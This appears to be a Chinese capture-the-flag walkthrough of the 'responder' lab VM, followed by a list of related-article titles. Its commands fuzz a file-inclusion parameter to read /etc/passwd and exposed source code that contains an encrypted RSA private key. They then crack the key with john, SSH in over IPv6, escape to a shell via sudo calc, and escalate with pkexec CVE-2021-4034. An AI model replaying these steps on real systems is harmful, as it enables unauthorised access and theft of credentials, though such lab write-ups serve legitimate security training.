1. IP

  2. 端口

  3. 访问 80 端口只有一句话,目录扫描


    访问 /filemanager.php 会跳转到 index.php ,可能是因为没有参数的原因,接下来爆破参数

    ffuf -u http://192.168.0.132/filemanager.php?FUZZ=/etc/passwd -w /root/Filenames_or_Directories_All.txt -fs 0
    

    得到参数 random ,burpsuite 抓包测试

  4. 使用 php 伪协议读取 filemanager.php 源码

    <?php$filename = $_GET['random'];include($filename);header('Location:/');/*-----BEGIN RSA PRIVATE KEY-----
    Proc-Type: 4,ENCRYPTED
    DEK-Info: DES-EDE3-CBC,411124D3C302D4F4XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
    X+lKp/fDKiZxmJdWu3WhLjgiXNbvX+fLiKZpWBzCAVpwSicS/jjIopzzWjE3PAB7
    vRfwdqdiaFK7mQxLJ3o/yrK2CCI8ud2UlEEk8DxTMGklmff8cbhrWIc+by+9AS9t
    vKd7hrsoLR6FaxBmfdO4dr1Qn9PZkvohHnMnpI7fdEC2Q3aqu6tFIODcVm6rBaII
    QM0CIRdWH/WiW7XmtJUriF55rQRJq4+ShXWtWKBXyJnYvyEduqQhieJ0BA9ZJjzy
    myaV1V5l0eKMhxWWBkYaz6bmFsLpbmXBBgIaiozKSKIMGWa1sWCAGv0EmMDRnDG4
    ClxkqgnDcgYskrdZLPJ5YN77M9OuB30/VIGXjzskJPp2XaubzYS7BvNjTbiD5uCU
    i1fHEzpPI/QeHQ25XlqlGCUla6b8mLFKMM91KcjO6TOSYgArC+kykbuqgDPMc7kt
    MKhxrsykmpkNz6FxsF78k/bmstPNbYDsa4ynzlIpiQHms+papIDcsHM4rUDib8Jh
    HQMfjbSchpL0YxVXAiz4Nvo33VQxp1WRh0geoO3bYz1D94FvozpeILFexnKaQeT3
    GLCLNyZ1BK/p5KKh5F1OhUU0brghzks5NjFYfNoGdnKfRsOIA+6X97AiDjqg9mk4
    YfbOgKHl75uELy41WzuNnuynfwWkANz7BhWV/QCLS7NiyaCucXJBJj3LRdT4Ckqf
    3F1SNgshDq4vDC4RwkJW2umTmDpW0rZ3syzeb9P4/bmQXkWX/btoIJzmnB6y++Bs
    XIrtZKa1yJ6/M0XA6tGTi+bnYD0wOmoU64M3l21HXvQUOXgSg5o0jIJQceTKcIN/
    wLLNM0ybmzq7z+MlLGrpyOez/fSAECvagyUZRmnks0eRR1oKzMS00e+qEFJ4GmeE
    Yu2dITC6I3pVRZQGcCsZWCX+BP+64Lcdz4/n5lensjab0jd28Kc72sraDteSlP/Y
    wWZM9sYbXtcs14cIPpW3a1dbkOT1WGEwjt0X0F0DNgApvA8XnlTr+whJVaMByA4U
    t3UQHVUINNoLnX7uSBPo96yWcwAMuXjk8j3ZaFVd5rOGq/Xd0pKBBARd2Un9QZnN
    4PzEWF1d9/BObzSeo2dVEZgYXcRE3v0oEZImFIoxQcvgoxxeYjNViX0SsYEJfA9F
    Pg8ZQ6R+ZjA3pU1DqBxWnErHDyeGsnVBs8VIQKOiiZMeB12Tx9b9k8E6rjRIw6La
    UbzpR+4CVgToD5TZBDpHhWHdPcv3JuNAb49XGdsL889uTwBX+fSTvL6FkXtZjySX
    gm6v5x/OPZg4BB/CnCWSeiG+rW0iMU4TGE5LqfuyBZBOhVcDtri3qpYLGH/5NKfw
    dq15m9rReh/Jec6Z8BNi9Xo5gEjGglQA/Tfw2VqCmrsMaU3iNMNXLKrYTcsm0qHb
    vRYvQl9GgeApdrZ/BY/ySb6OjNUS1Nc9Viv0AM9iCHp4tH6OfmVpnVzDuojdkXiZ
    lB/vwbCo9CcBZt7lM91Hl60ZlhLsOa/69PAeC3cZR2Z1svVk1gcDrw==
    -----END RSA PRIVATE KEY-----*/?>
    

    得到了 ssh 私钥,但是端口扫描得知 22 端口处于 filter 状态

  5. 爆破 ssh 私钥

    john --wordlists=/usr/share/wordlists/rockyou.txt hash.txt
    

  6. 使用 ipv6 地址链接 ssh

    curl 'http://192.168.0.132/filemanager.php?random=/proc/net/if_inet6'fe80000000000000020c29fffefeab39 02 40 20 80    ens33
    00000000000000000000000000000001 01 80 10 80       lo
    fd154ba55a2b1008020c29fffefeab39 02 40 00 00    ens33
    

    使用 nmap 扫描

    nmap -6 -p22 fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39
    

    连接

    ssh elliot@fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39 -i id_rsa  -6
    
  7. 执行 sudo -l

    发现可以以 rohit 用户运行 calc ,执行 !/bin/bash 获得 shell

    查看 SUID 文件,发现可以运行 pkexec ,使用 CVE-2021-4034 进行提权

靶机渗透日记 responder相关推荐

  1. 靶机渗透日记 controller

    IP 端口 目录扫描 发现是 wordpress ,使用 wpscan 扫描一下,并没有发现存在漏洞的插件,但是扫描到了一个用户 control ,但是没有爆破出来 访问80端口 文档说明我们可以上传 ...

  2. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  3. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  4. [HTB]“Heist”靶机渗透详细思路

    今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...

  5. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  6. 【渗透测试】靶机渗透Vulnhub-bulldog

    目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...

  7. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  8. Bulldog靶机渗透

    Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...

  9. 【VulnHub靶机渗透】一:BullDog2

    在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...

  10. bulldog2 靶机渗透

    bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的 ...

最新文章

  1. 在网站SEO优化为何要加入网站地图?
  2. 威胁报告:mDNS 反射式 DDoS 攻击
  3. 2015生命之旅---第一站重庆
  4. 机器学习中规则化和模型选择知识
  5. 延时函数、数码管显示头文件(单片机)
  6. Coding the Matrix Week 3 The Matrix 矩阵
  7. Oracle添加主键和唯一约束最佳实践
  8. 2011计算机等级考试二级c语言公共基础教程.doc,2011年全国计算机等级考试二级c语言公共基础知识复习100题及答案.doc...
  9. gradle maven_Gradle vs Maven
  10. 姿态估计之2D人体姿态估计 - CPN(Cascaded Pyramid Network for Multi-Person Pose Estimation)
  11. 机器学习-西瓜书-模型评估
  12. m4a格式怎么转换成mp3,非常简单
  13. mysql条件删除表中某些行数据_根据MySQL中的条件仅删除表中的某些行
  14. 电脑连接信捷PLC方法
  15. MySQL之数据库基字符集,中文乱码,大小写敏感,Packet for query is too large
  16. 【CSDN AI 周刊】No. 005 | 高精地图在无人驾驶中的应用
  17. 数学建模与数据分析中的时间序列分析
  18. 2022秋招蚂蚁金服面试
  19. 边界函数(decision boundary)
  20. 美刊评选出25年十大牛股 微软思科甲骨文入选

热门文章

  1. 网络存储NAS网络存储器术语解释
  2. 教学小结:我这样帮助学生提出疑问
  3. 百度有啊创始团队写博客 自曝高层动荡内幕
  4. 淘宝客防止偷单淘宝联盟检测偷单验证PID是否为自己推广位
  5. qq邮箱登录收件服务器是什么,你好请问qq邮箱收件服务器不能为空是什么意思...
  6. springboot整合postgresql
  7. 查询linux下的业务端口,Linux系统查询显示端口信息用什么命令
  8. linux进程监控及管理
  9. 网络抓包与HTTP协议(采用wireshark、Fiddler抓包软件)
  10. html绘图插件,canvas,svg,vml绘图插件